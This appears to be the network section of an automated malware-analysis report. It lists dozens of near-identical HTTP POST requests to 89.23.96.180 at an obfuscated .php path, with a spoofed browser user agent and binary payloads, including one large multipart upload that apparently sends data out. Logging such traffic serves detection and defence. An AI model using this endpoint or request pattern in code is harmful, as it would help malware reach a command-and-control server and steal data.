Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2112Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2100Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: multipart/form-data; boundary=----B9co6awbhp0NMn6zd75TICxIjElnpRVpUqUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 124462Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2532Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2100Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2112Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2112Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2528Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2084Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2112Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2112Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2112Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2520Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2112Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2112Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2112Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
